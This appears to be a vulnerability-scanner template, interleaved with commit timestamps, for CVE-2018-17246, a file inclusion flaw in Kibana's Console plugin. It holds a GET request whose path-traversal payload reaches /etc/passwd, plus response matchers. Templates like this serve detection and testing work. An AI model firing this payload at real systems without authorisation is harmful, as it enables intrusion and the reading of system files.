2021-04-08 21:05:42 +00:00
id : CVE-2018-17246
2022-04-22 10:38:41 +00:00
2021-04-08 21:01:08 +00:00
info :
name : Kibana Local File Inclusion
author : princechaddha
2021-09-10 11:26:40 +00:00
severity : critical
2022-04-22 10:38:41 +00:00
description : Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute
javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
2021-08-18 11:37:49 +00:00
reference :
2021-04-08 21:01:08 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
- https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-17246
cwe-id : CWE-829
2022-04-22 10:38:41 +00:00
tags : cve,cve2018,lfi,kibana
2021-04-08 21:01:08 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : word
words :
- "\"message\":\"An internal server error occurred\""
part : body
- type : word
words :
- "kbn-name"
- "application/json"
- "kibana"
condition : and
part : header
- type : status
status :
- 500
